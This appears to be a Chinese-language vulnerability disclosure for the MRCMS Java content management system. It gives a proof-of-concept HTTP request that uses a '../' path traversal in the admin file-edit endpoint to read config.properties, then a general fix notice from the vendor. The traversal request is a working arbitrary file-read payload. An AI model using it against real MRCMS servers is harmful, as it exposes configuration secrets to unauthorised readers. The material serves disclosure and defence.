MRCMS 是一款Java开发的内容管理系统,采用数据模型+模板+插件实现,内置提供了文章模型发布功能。
https://gitee.com/marker/MRCMS
GET /admin/file/edit.do?path=../resources/config.properties&name= HTTP/1.1 Host: 127.0.0.1:8080 Referer: http://127.0.0.1:8080/admin/index.do Sec-Fetch-Dest: empty Sec-Fetch-Site: same-origin User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 Accept: text/html, */*; q=0.01 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate, br Sec-Fetch-Mode: cors X-Requested-With: XMLHttpRequest
提交文件路径会检查路径path参数是否.. 开头
MRCMS任意文件读取漏洞修复公告
尊敬的用户:
为了确保系统的安全性和稳定性,我们已针对MRCMS系统中发现的任意文件读取漏洞进行了紧急修复。该漏洞可能导致未经授权的用户读取服务器上的敏感文件,存在潜在的安全风险。
修复措施:
输入验证增强:对所有用户输入进行了严格的验证和过滤,防止恶意文件路径的注入。
权限控制优化:加强了文件访问的权限控制,确保只有授权用户才能访问特定文件。
安全补丁发布:已发布最新的安全补丁,建议所有用户尽快更新至最新版本。
建议操作:
请立即下载并安装最新的安全补丁。
定期检查系统日志,监控异常文件访问行为。
建议对所有用户进行安全意识培训,避免类似漏洞的利用。
我们始终将用户数据安全放在首位,感谢您的理解与支持。如有任何疑问或需要进一步的帮助,请随时联系我们的技术支持团队。
MRCMS团队
